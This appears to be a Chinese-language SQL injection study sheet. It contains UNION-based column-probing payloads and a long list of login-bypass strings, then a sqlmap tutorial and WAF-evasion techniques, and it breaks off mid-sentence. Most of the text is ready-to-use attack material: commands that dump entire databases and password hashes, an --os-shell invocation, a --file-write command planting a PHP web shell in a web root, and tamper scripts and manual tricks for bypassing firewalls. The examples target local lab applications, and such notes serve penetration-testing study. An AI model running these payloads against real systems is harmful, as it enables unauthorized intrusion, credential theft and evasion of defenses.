UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8--
UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9--
UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10--
UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11--
UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12--
UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13--
UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14--
UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15--
UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16--
UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17--
UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18--
UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19--
UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20--
UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21--
UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22--
UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23--
UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24--
UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25--
UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26--
UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27--
UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28--
UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29--
UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30--
UNION ALL SELECT 'INJ'||'ECT'||'XXX'#
UNION ALL SELECT 'INJ'||'ECT'||'XXX',2#
UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3#
UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4#
UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5#
UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6#
UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7#
UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8#
UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9#
UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10#
UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11#
UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12#
UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13#
UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14#
UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15#
UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16#
UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17#
UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18#
UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19#
UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20#
UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21#
UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22#
UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23#
UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24#
UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25#
5. SQL注入 Auth Bypass Payloads
'-'
' '
'&'
'^'
'*'
' or ''-'
' or '' '
' or ''&'
' or ''^'
' or ''*'
"-"
" "
"&"
"^"
"*"
" or ""-"
" or "" "
" or ""&"
" or ""^"
" or ""*"
or true--
" or true--
' or true--
") or true--
') or true--
' or 'x'='x
') or ('x')=('x
')) or (('x'))=(('x
" or "x"="x
") or ("x")=("x
")) or (("x"))=(("x
or 1=1
or 1=1--
or 1=1#
or 1=1/*
admin' --
admin' #
admin'/*
admin' or '1'='1
admin' or '1'='1'--
admin' or '1'='1'#
admin' or '1'='1'/*
admin'or 1=1 or ''='
admin' or 1=1
admin' or 1=1--
admin' or 1=1#
admin' or 1=1/*
admin') or ('1'='1
admin') or ('1'='1'--
admin') or ('1'='1'#
admin') or ('1'='1'/*
admin') or '1'='1
admin') or '1'='1'--
admin') or '1'='1'#
admin') or '1'='1'/*
1234 ' AND 1=0 UNION ALL SELECT 'admin', '81dc9bdb52d04dc20036dbd8313ed055
admin" --
admin" #
admin"/*
admin" or "1"="1
admin" or "1"="1"--
admin" or "1"="1"#
admin" or "1"="1"/*
admin"or 1=1 or ""="
admin" or 1=1
admin" or 1=1--
admin" or 1=1#
admin" or 1=1/*
admin") or ("1"="1
admin") or ("1"="1"--
admin") or ("1"="1"#
admin") or ("1"="1"/*
admin") or "1"="1
admin") or "1"="1"--
admin") or "1"="1"#
admin") or "1"="1"/*
1234 " AND 1=0 UNION ALL SELECT "admin", "81dc9bdb52d04dc20036dbd8313ed055
sqlmap学习
命令介绍
一篇比较详细的文章:https://www.freebuf.com/sectool/164608.html
sqlmap基本命令:
1、查看版本
sqlmap.py --version
2、查看帮助
sqlmap.py --help
3、测试url是否有注入的可能
sqlmap.py -u http://127.0.0.1/btslab/vulnerability/ForumPosts.php?id=1
4、不询问用户,使用所有默认的配置,可能会触发WAF的告警
sqlmap.py -u http://127.0.0.1/btslab/vulnerability/ForumPosts.php?id=1 --batch
5、暴库(列出所有的数据库)
sqlmap.py -u http://127.0.0.1/btslab/vulnerability/ForumPosts.php?id=1 --dbs
6、web当前使用的数据库
sqlmap.py -u http://127.0.0.1/btslab/vulnerability/ForumPosts.php?id=1 --current-db
7、当前使用数据库的用户
sqlmap.py -u http://127.0.0.1/btslab/vulnerability/ForumPosts.php?id=1 --current-user
8、列出数据库所有的用户
sqlmap.py -u http://127.0.0.1/btslab/vulnerability/ForumPosts.php?id=1 --users
9、列出数据库的用户和密码
sqlmap.py -u http://127.0.0.1/btslab/vulnerability/ForumPosts.php?id=1 --passwords
10、列出数据中所有的表
sqlmap.py -u http://127.0.0.1/btslab/vulnerability/ForumPosts.php?id=1 --tables -D bts
11、列出数据库bts特定表users的结构,所有字段
sqlmap.py -u http://127.0.0.1/btslab/vulnerability/ForumPosts.php?id=1 --columns -D bts -T users
12、脱裤 数据库bts,表users,字段username和password
sqlmap.py -u http://127.0.0.1/btslab/vulnerability/ForumPosts.php?id=1 --dump -D bts -T users -C "username,password"
13、脱裤,整个数据库
sqlmap.py -u http://127.0.0.1/btslab/vulnerability/ForumPosts.php?id=1 --dump-all
Options
--version:显示当前sqlmap的版本号
-h:显示帮助信息
-hh:显示详细的帮助信息
-v VERBOSE:详细级别,VERBOSE为数字,默认为1
Target
-d DIRECT:直接连接到数据库
-u URL 或--url=URL:目标地址(URL)
-l LOGFILE:从Burp或WebScarab代理的日志中解析目标
-x SITEMAPURL:从一个XML文件中解析目标
-m BULKFILE:扫描文本文件中的多个目标
-r REQUESTFILE:从文件中导入HTTP请求(通常用于检查POST请求中的SQL注入)
-g GOOGLEDORK:处理Google Dork的结果作为目标URL
-c CONFIGFILE:从ini文件中加载选项
Request
--method=MEHOTD:强制指定HTTP方法(如PUT)
--data=DATA:指定POST请求的参数
--param-del=PARAMDEL:指定参数的分隔符(如:&)
--cookie=COOKIE:指定HTTP请求的Cookie
--cookie-del=COOKIEDEL:指定Cookie的分隔符(如:分号;)
--load-cookies=LOADCOOKIES:指定以Netscape或wget且包含cookie的文件
--drop-set-cookie:忽略返回包中的Set-Cookie字段
--user-agent:指定HTTP头部的user-agent值
--random-agent:设置随机的HTTP User-Agent
--host=HOST:指定HTTP头部的host值
--referer=REFERER:指定HTTP头部中的referer值
-H=HEADER:指定HTTP其他头部信息
--headers=HEADERS:指定HTTP其他头部信息
--auth-type=AUTHTYPE:指定HTTP的认证类型(Basic,Digest,NTLM,PKI)
--auth-cred=AUTHCRED:指定HTTP认证凭证(name:password)
--auth-file=AUTHFILE:指定HTTP认证PEM认证/私钥文件
--ignore-code=IGNORECODE:忽略指定的HTTP错误码(如:401)
--ignore-proxy:忽略系统默认代理
--ignore-redirects:忽略重定向尝试
--ignore-timeouts:忽略连接超时
--proxy=PROXY:指定代理地址
--proxy-cred=PROXYCRED:指定代理认证凭据(name:password)
--proxy-file=PROXYFILE:从指定文件中加载代理数据
--tor:使用tor匿名网络(通常需要提高默认的响应时长,且需要指定Tor的代理地址)
--tor-port=TORPORT:设置TOR代理的端口(修改默认端口)
--tor-type=TORTYPE:设置TOR代理的类型(HTTP,SOCKS4,SOCKS5默认)
--check-tor:检查tor能否正常使用
--delay=DELAY:设置每个HTTP请求的间隔时间(单位:秒)
--timeout=TIMEOUT:设置超时连接前等待的时间(单位:秒)
--retries=RETRIES:设置连接超时重新尝试的次数(默认为3)
--randomize=RPARAM:随机更改给定参数的值
--safe-url=SAFEURL:指定在测试期间频繁访问的URL
--safe-post=SAFEPOST:POST数据发送到安全URL
--safe-req=SAFEREQ:从文件中加载HTTP请求
--safe-freq=SAFEFREQ:在两次访问安全网址之间的测试请求
--skip-urlencode:跳过经过URL编码的payload数据
--csrf-token=CSRFTOKEN:指定CSRF-TOKEN值
--csrf-url=CSRFURL:指定提取CSRF-TOKEN的URL值
--force-ssl:强制使用SSL协议
--hpp:使用HTTP参数pollution的方法
--eval:评估请求之前提供Python代码
Optimization
-o:开启所有优化开关
--predict-output:预测常见的查询输出
--keep-alive:使用持久的HTTP(S)连接
--null-connection:从没有实际的HTTP响应体中检索页面长度
--threads=THREADS:设置请求的并发数
Injection
-p TESTPARAMETER:指定需要测试的参数
--skip=SKIP:跳过指定参数的测试
--skip-static:跳过非动态参数的测试
--param-exclude=PARAMEXCLUDE:使用正则排除要测试的参数
--dbms=DBMS:强制指定数据库管理系统的类型
--dbms-cred=DBMSCRED:指定DBMS认证凭证(name:password)
--os=OS:指定后端DBMS的操作系统
--invalid-logical:使用大数字使值无效
--invalid-string:使用随机字符串使值无效
no-cast:关闭有效载荷
--no-escape:关闭字符串转义机制
--prefix=PREFIX:注入payload字符串前缀
--suffix=SUFFIX:注入payload字符串后缀
--tamper=TAMPER:使用给定脚本篡改注入数据
Detection
--level=LEVEL:指定执行检测的等级(1-5,默认为1)
--risk=RISK:指定执行检测的风险(1-5,默认为1)
--string=STRING:查询有效时在页面匹配字符串
--not-string=NOTSTRING:查询无效时在页面匹配字符串
--regexp=REGEXP:查询有效时在页面匹配正则表达式
--code=CODE:查询有效时匹配的HTTP返回码
--text-only:基于文本内容比较网页
--titles:基于标题比较网页
Techniques
--technique=TECH:指定SQL注入的技术(默认为BEUST)
--time-sec=TIMESEC:DBMS响应的延迟时间
--union-cols=UCOLS:指定UNION查询注入使用的列
--union-char=UCHAR:指定暴力猜解列数的字符
--union-from=UFROM:指定UNION查询注入的FROM部分使用的表
--dns-domain=DNSDOMAIN:域名用于DNS漏出攻击
Enumeration
-a或--all:检索一切
-b,--banner:检索数据库管理系统的标识
--current-user:检索数据库管理系统的当前用户名
--current-db:检索DBMS的当前数据库名称
--hostname:检索数据库服务器的主机名
--is-dba:检测DBMS当前用户是否为DBA
--users:枚举DBMS的用户名
--passwords:枚举DBMS用户密码哈希
--privileges:枚举DBMS用户的权限
--roles:枚举DBMS用户的角色
--dbs:枚举DBMS所有的数据库名称
--tables:枚举DBMS数据库中所有的表
--columns:枚举DBMS数据库表中所有的列名
--schema:枚举数据库架构
--count:检索表的记录数
--dump:转储DBMS的数据库中的表项
--dump-all:转储DBMS的数据库中的所有表项
--search:搜索列、表、数据库名称
--commnets:检索数据库的comments
-D DB:指定要枚举的数据库名称
-T TBL:指定要枚举的数据表名称
-C COL:指定要枚举的数据库列名
-X EXCLUDECOL:指定不要枚举的数据库列名
-U USER:指定要进行枚举的数据库用户名
--exclude-sysdbs:枚举表时排除系统数据库
--where=DUMPWHERE:使用WHERE条件表转储
--start=LIMITSTART:第一个查询输出进入检索
--stop=LIMITSTOP:最后查询的输出进入检索
--first=FIRSTCHAR:第一个查询输出字的字符检索
--last=LASTCHAR:最后查询的输出字字符检索
--sql-query=QUERY:要执行的SQL语句
--sql-file=SQLFILE:从给定文件中执行SQL语句
使用场景
sqlmap -u "http://192.168.10.1/sqli/Less-1/?id=1" #探测该url是否存在漏洞
sqlmap -u "http://192.168.10.1/sqli/Less-1/?id=1" --passwords #查看数据库用户名的密码
sqlmap -u "http://192.168.10.1/sqli/Less-1/?id=1" --current-user #查看数据库当前的用户
sqlmap -u "http://192.168.10.1/sqli/Less-1/?id=1" --is-dba #判断当前用户是否有管理员权限
sqlmap -u "http://192.168.10.1/sqli/Less-1/?id=1" --roles #列出数据库所有管理员角色
sqlmap -u "http://192.168.10.1/sqli/Less-1/?id=1" --dbs
sqlmap -u "http://192.168.10.1/sqli/Less-1/?id=1" --current-db #查看当前的数据库
sqlmap -u "http://192.168.10.1/sqli/Less-1/?id=1" -D security --tables #爆出数据库security中的所有的表
sqlmap -u "http://192.168.10.1/sqli/Less-1/?id=1" -D security -T users --columns
sqlmap -u "http://192.168.10.1/sqli/Less-1/?id=1" -D security -T users -C username --dump #爆出数据库security中的users表中的username列中的所有数据
sqlmap -u "http://192.168.10.1/sqli/Less-1/?id=1" -D security -T users --dump-all #爆出数据库security中的users表中的所有数据
sqlmap -u "http://192.168.10.1/sqli/Less-1/?id=1" -D security --dump-all #爆出数据库security中的所有数据
sqlmap -u "http://192.168.10.1/sqli/Less-1/?id=1" --dump-all #爆出该数据库中的所有数据
高级用法
探测指定URL是否存在WAF,并且绕过
--identify-waf 检测是否有WAF
#使用参数进行绕过
--random-agent 使用任意HTTP头进行绕过,尤其是在WAF配置不当的时候
--time-sec=3 使用长的延时来避免触发WAF的机制,这方式比较耗时
--hpp 使用HTTP 参数污染进行绕过,尤其是在ASP.NET/IIS 平台上
--proxy=100.100.100.100:8080 --proxy-cred=211:985 使用代理进行绕过
--ignore-proxy 禁止使用系统的代理,直接连接进行注入
--flush-session 清空会话,重构注入
--hex 或者 --no-cast 进行字符码转换
--mobile 对移动端的服务器进行注入
--tor 匿名注入
有些时候网站会过滤掉各种字符,可以用tamper来解决(对付某些waf时也有成效)
sqlmap --tamper=space2comment.py #用/**/代替空格
sqlmap --tamper="space2comment.py,space2plus.py" 指定多个脚本进行过滤
探测等级和危险等级(—level —risk)
Sqlmap一共有5个探测等级,默认是1。等级越高,说明探测时使用的payload也越多。其中5级的payload最多,会自动破解出cookie、XFF等头部注入。当然,等级越高,探测的时间也越慢。这个参数会影响测试的注入点,GET和POST的数据都会进行测试,HTTP cookie在level为2时就会测试,HTTP User-Agent/Referer头在level为3时就会测试。在不确定哪个参数为注入点时,为了保证准确性,建议设置level为5
sqlmap一共有3个危险等级,也就是说你认为这个网站存在几级的危险等级。和探测等级一个意思,在不确定的情况下,建议设置为3级,—risk=3
sqlmap使用的payload在目录:/usr/share/sqlmap/xml/payloads
sqlmap -u "http://192.168.10.1/sqli/Less-4/?id=1" --level=5 --risk=3 #探测等级5,平台危险等级3,都是最高级别
伪造 Http Referer头部
Sqlmap可以在请求中伪造HTTP中的referer,当探测等级为3或者3以上时,会尝试对referer注入,可以使用referer命令来欺骗,比如,我们伪造referer头为百度。可以这样
referer http://www.baidu.com
执行指定的SQL语句(—sql-shell)
sqlmap -u "http://192.168.10.1/sqli/Less-1/?id=1" --sql-shell #执行指定的sql语句
执行操作系统命令(—os-shell)
sqlmap -u "http://192.168.10.1/sqli/Less-4/?id=1" --os-shell #执行--os-shell命令
当为MySQL数据库时,需满足下面三个条件:
当前用户为 root
知道网站根目录的绝对路径
该数据库的 secure_file_priv 参数值为空(很多数据库的该值为NULL,这也就导致了即使当前用户是root,即使知道了网站根目录的绝对路径,也不能执行成功 —os-shell )
反弹一个MSF的shell
我这里window没装MSF,无法实验
上传文件到数据库服务器中
python sqlmap.py -u "http://127.0.0.1/pikachu/vul/sqli/sqli_str.php?name=vicne*&submit=%E6%9F%A5%E8%AF%A2" --dbms=mysql --technique U -v 3 --file-write C:\Users\flow\Desktop\py\123.php --file-dest "D:\phpStudy\PHPTutorial\WWW\pikachu\shell2.php"
tamper 汇总
一、支持所有的数据库
1、apostrophemask.py
作用:用utf8代替引号
("1 AND '1'='1")替换后'1 AND %EF%BC%871%EF%BC%87=%EF%BC%871'
2、base64encode.py
作用:用base64编码替换
("1' AND SLEEP(5)#")替换后'MScgQU5EIFNMRUVQKDUpIw=='
3、multiplespaces.py
作用:围绕SQL关键字添加多个空格
('1 UNION SELECT foobar')替换后'1 UNION SELECT foobar'
4、space2plus.py
作用:用+替换空格
('SELECT id FROM users')替换后'SELECT+id+FROM+users'
5、nonrecursivereplacement.py
作用:双重查询语句
('1 UNION SELECT 2--')替换后'1 UNIOUNIONN SELESELECTCT 2--'
6、space2randomblank.py
作用:代替空格字符(“”)从一个随机的空白字符可选字符的有效集
('SELECT id FROM users')替换后'SELECT%0Did%0DFROM%0Ausers'
7、unionalltounion.py
作用:替换UNION ALL SELECT UNION SELECT
('-1 UNION ALL SELECT')替换后'-1 UNION SELECT'
8、securesphere.py
作用:追加特制的字符串
('1 AND 1=1')替换后"1 AND 1=1 and '0having'='0having'"
二、MSSQL数据库
1、space2hash.py
作用:绕过过滤‘=’ 替换空格字符(”),(’ – ‘)后跟一个破折号注释,一个随机字符串和一个新行(’ n’)
'1 AND 9227=9227'替换后'1--nVNaVoPYeva%0AAND--ngNvzqu%0A9227=9227'
2、equaltolike.py
作用:like 代替等号
SELECT * FROM users WHERE id=1替换后SELECT * FROM users WHERE id LIKE 1
3、space2mssqlblank.py(mssql)
作用:空格替换为其它空符号
SELECT id FROM users替换后SELECT%08id%02FROM%0Fusers
4、space2mssqlhash.py
作用:替换空格
('1 AND 9227=9227')替换后'1%23%0AAND%23%0A9227=9227'
5、between.py
作用:用between替换大于号(>)
('1 AND A > B--')替换后'1 AND A NOT BETWEEN 0 AND B--'
6、percentage.py
作用:asp允许每个字符前面添加一个%号
SELECT FIELD FROM TABLE替换后%S%E%L%E%C%T %F%I%E%L%D %F%R%O%M %T%A%B%L%E
7、sp_password.py
作用:追加sp_password’从DBMS日志的自动模糊处理的有效载荷的末尾
('1 AND 9227=9227-- ')替换后'1 AND 9227=9227-- sp_password'
8、charencode.py
作用:url编码
SELECT FIELD FROM%20TABLE替换后 %53%45%4c%45%43%54%20%46%49%45%4c%44%20%46%52%4f%4d%20%54%41%42%4c%45
9、randomcase.py
作用:随机大小写
INSERT替换后InsERt
10、charunicodeencode.py
作用:字符串 unicode 编码
SELECT FIELD%20FROM TABLE替换后%u0053%u0045%u004c%u0045%u0043%u0054%u0020%u0046%u0049%u0045%u004c%u0044%u0020%u0046%u0052%u004f%u004d%u0020%u0054%u0041%u0042%u004c%u0045′
11、space2comment.py
作用:将空格替换成/**/
SELECT id FROM users替换后SELECT/**/id/**/FROM/**/users
三、MYSQL数据库
1、equaltolike.py
作用:like 代替等号
SELECT * FROM users WHERE id=1替换后SELECT * FROM users WHERE id LIKE 1
2、greatest.py
作用:绕过过滤’>’ ,用GREATEST替换大于号。
('1 AND A > B')替换后'1 AND GREATEST(A,B+1)=A'
3、apostrophenullencode.py
作用:绕过过滤双引号,替换字符和双引号。
("1 AND '1'='1")替换后'1 AND %00%271%00%27=%00%271'
4、ifnull2ifisnull.py
作用:绕过对 IFNULL 过滤。
('IFNULL(1, 2)')替换后'IF(ISNULL(1),2,1)'
5、space2mssqlhash.py
作用:替换空格
('1 AND 9227=9227')替换后'1%23%0AAND%23%0A9227=9227'
6、modsecurityversioned.py
作用:过滤空格,包含完整的查询版本注释
('1 AND 2>1--')替换后'1 /*!30874AND 2>1*/--'
7、space2mysqlblank.py
作用:空格替换其它空白符号(mysql)
SELECT id FROM users替换后SELECT%0Bid%0BFROM%A0users
8、between.py
作用:用between替换大于号(>)
('1 AND A > B--')替换后'1 AND A NOT BETWEEN 0 AND B--'
9、modsecurityzeroversioned.py
作用:包含了完整的查询与零版本注释
('1 AND 2>1--')替换后'1 /*!00000AND 2>1*/--'
10、space2mysqldash.py
作用:替换空格字符(' ')(' – ')后跟一个破折号注释一个新行(' n')
('1 AND 9227=9227')替换后'1--%0AAND--%0A9227=9227'
11、bluecoat.py
作用:代替空格字符后与一个有效的随机空白字符的SQL语句。然后替换=为like
('SELECT id FROM users where id = 1')替换后'SELECT%09id FROM users where id LIKE 1'
12、percentage.py
作用:asp允许每个字符前面添加一个%号
SELECT FIELD FROM TABLE替换后%S%E%L%E%C%T %F%I%E%L%D %F%R%O%M %T%A%B%L%E
13、charencode.py
作用:url编码
SELECT FIELD FROM%20TABLE替换后 %53%45%4c%45%43%54%20%46%49%45%4c%44%20%46%52%4f%4d%20%54%41%42%4c%45
14、randomcase.py
作用:随机大小写
INSERT替换后 InsERt
15、versionedkeywords.py
作用:注释绕过
('1 UNION ALL SELECT NULL, NULL, CONCAT(CHAR(58,104,116,116,58),IFNULL(CAST(CURRENT_USER() AS CHAR),CHAR(32)),CHAR(58,100,114,117,58))#') 替换后 1/*!UNION*//*!ALL*//*!SELECT*//*!NULL*/,/*!NULL*/, CONCAT(CHAR(58,104,116,116,58),IFNULL(CAST(CURRENT_USER()/*!AS*//*!CHAR*/),CHAR(32)),CHAR(58,100,114,117,58))#
16、space2comment.py
作用:将空格替换为/**/
SELECT id FROM users替换后 SELECT/**/id/**/FROM/**/users
17、charunicodeencode.py
作用:字符串 unicode 编码
SELECT FIELD%20FROM TABLE替换后%u0053%u0045%u004c%u0045%u0043%u0054%u0020%u0046%u0049%u0045%u004c%u0044%u0020%u0046%u0052%u004f%u004d%u0020%u0054%u0041%u0042%u004c%u0045′
18、versionedmorekeywords.py
作用:注释绕过
1 UNION ALL SELECT NULL, NULL, CONCAT(CHAR(58,122,114,115,58),IFNULL(CAST(CURRENT_USER() AS CHAR),CHAR(32)),CHAR(58,115,114,121,58))#替换后1/*!UNION**!ALL**!SELECT**!NULL*/,/*!NULL*/,/*!CONCAT*/(/*!CHAR*/(58,122,114,115,58),/*!IFNULL*/(CAST(/*!CURRENT_USER*/()/*!AS**!CHAR*/),/*!CHAR*/(32)),/*!CHAR*/(58,115,114,121,58))#
mysql小于5.1
19、halfversionedmorekeywords.py
作用:关键字前加注释
value’ UNION ALL SELECT CONCAT(CHAR(58,107,112,113,58),IFNULL(CAST(CURRENT_USER() AS CHAR),CHAR(32)),CHAR(58,97,110,121,58)), NULL, NULL# AND ‘QDWa’='QDWa替换后value’/*!0UNION/*!0ALL/*!0SELECT/*!0CONCAT(/*!0CHAR(58,107,112,113,58),/*!0IFNULL(CAST(/*!0CURRENT_USER()/*!0AS/*!0CHAR),/*!0CHAR(32)),/*!0CHAR(58,97,110,121,58)), NULL, NULL#/*!0AND ‘QDWa’='QDWa
20、halfversionedmorekeywords.py
作用:当数据库为mysql时绕过防火墙,每个关键字之前添加
("value' UNION ALL SELECT CONCAT(CHAR(58,107,112,113,58),IFNULL(CAST(CURRENT_USER() AS CHAR),CHAR(32)),CHAR(58,97,110,121,58)), NULL, NULL# AND 'QDWa'='QDWa")替换后"value'/*!0UNION/*!0ALL/*!0SELECT/*!0CONCAT(/*!0CHAR(58,107,112,113,58),/*!0IFNULL(CAST(/*!0CURRENT_USER()/*!0AS/*!0CHAR),/*!0CHAR(32)),/*!0CHAR(58,97,110,121,58)),/*!0NULL,/*!0NULL#/*!0AND 'QDWa'='QDWa"
四、Oracle数据库
1、greatest.py
作用:绕过过滤’>’ ,用GREATEST替换大于号。
('1 AND A > B')替换后'1 AND GREATEST(A,B+1)=A'
2、apostrophenullencode.py
作用:绕过过滤双引号,替换字符和双引号。
("1 AND '1'='1")替换后'1 AND %00%271%00%27=%00%271'
3、between.py
作用:用between替换大于号(>)
('1 AND A > B--')替换后'1 AND A NOT BETWEEN 0 AND B--'
4、charencode.py
作用:url编码
SELECT FIELD FROM%20TABLE替换后%53%45%4c%45%43%54%20%46%49%45%4c%44%20%46%52%4f%4d%20%54%41%42%4c%45
5、randomcase.py
作用:随机大小写
INSERT替换后 InsERt
6、charunicodeencode.py
作用:字符串 unicode 编码
SELECT FIELD%20FROM TABLE替换后%u0053%u0045%u004c%u0045%u0043%u0054%u0020%u0046%u0049%u0045%u004c%u0044%u0020%u0046%u0052%u004f%u004d%u0020%u0054%u0041%u0042%u004c%u0045′
7、space2comment.py
作用:将空格替换成/**/
SELECT id FROM users替换后SELECT/**/id/**/FROM/**/users
五、PostgreSQL数据库
1、greatest.py
作用:绕过过滤’>’ ,用GREATEST替换大于号。
('1 AND A > B')替换后'1 AND GREATEST(A,B+1)=A'
2、apostrophenullencode.py
作用:绕过过滤双引号,替换字符和双引号。
("1 AND '1'='1")替换后'1 AND %00%271%00%27=%00%271'
3、between.py
作用:用between替换大于号(>)
('1 AND A > B--')替换后'1 AND A NOT BETWEEN 0 AND B--'
4、percentage.py
asp允许每个字符前面添加一个%号
SELECT FIELD FROM TABLE替换后%S%E%L%E%C%T %F%I%E%L%D %F%R%O%M %T%A%B%L%E
5、charencode.py
作用:url编码
SELECT FIELD FROM%20TABLE替换后%53%45%4c%45%43%54%20%46%49%45%4c%44%20%46%52%4f%4d%20%54%41%42%4c%45
6、randomcase.py
作用:随机大小写
INSERT替换后 InsERt
7、charunicodeencode.py
作用:字符串 unicode 编码
SELECT FIELD%20FROM TABLE替换%u0053%u0045%u004c%u0045%u0043%u0054%u0020%u0046%u0049%u0045%u004c%u0044%u0020%u0046%u0052%u004f%u004d%u0020%u0054%u0041%u0042%u004c%u0045′
8、space2comment.py
作用:将空格替换成/**/
SELECT id FROM users替换后SELECT/**/id/**/FROM/**/users
六、Microsoft Access数据库
1、appendnullbyte.py
作用:在有效负荷结束位置加载零字节字符编码
('1 AND 1=1')替换后'1 AND 1=1%00'
七、其他数据库
1、chardoubleencode.py
作用:双url编码(不处理已编码的)
SELECT FIELD FROM%20TABLE替换后%2553%2545%254c%2545%2543%2554%2520%2546%2549%2545%254c%2544%2520%2546%2552%254f%254d%2520%2554%2541%2542%254c%2545
2、unmagicquotes.py
作用:宽字符绕过 GPC addslashes
1′ AND 1=1替换后1%bf%27 AND 1=1--
3、randomcomments.py
作用:用/**/分割sql关键字
手工编写tamper
tamper位置
tamper文件夹下的所有python文件都满足以下格式
import re
from lib.core.enums import PRIORITY
__priority__ = PRIORITY.HIGHEST
# 对当前脚本的介绍(不用管)
def dependencies():
pass
# 对payload进行处理(知识举个例子 payload将空格变成/**/ 将union变成UnIoN)
def tamper(payload, **kwargs):
payload = payload.replace('union', 'UnIoN')
payload = payload.replace(' ', '/**/')
return payload
可以配合手工测试,绕过waf,然后编写tamper进行批量注入
和burp联动
burp有个插件是:sqlmap4burp++.0.2
可以一键调用sqlmap
手工绕过waf
空格绕过
两个空格代替一个空格,用Tab代替空格,%a0=空格:
%20 %09 %0a %0b %0c %0d %a0 %00 /**/ /*!*/
最基本的绕过方法,用注释替换空格
/* 注释 */
如果空格被过滤,括号没有被过滤,可以用括号绕过。
在MySQL中,括号是用来包围子查询的。因此,任何可以计算出结果的语句,都可以用括号包围起来。而括号的两端,可以没有多余的空格。
例如:
select(user())from dual where(1=1)and(2=2)
引号绕过
会使用到引号的地方一般是在最后的where子句中,使用16进制绕过
select column_name from information_schema.tables where table_name=0x7573657273
逗号绕过
在使用盲注的时候,需要使用到substr(),mid(),limit。这些子句方法都需要使用到逗号。对于substr()和mid()这两个方法可以使用from to的方式来解决:
select substr(database() from 1 for 1);
select mid(database() from 1 for 1);
使用join:
union select 1,2 #等价于
union select * from (select 1)a join (select 2)
使用like:
select ascii(mid(user(),1,1))=80 #等价于
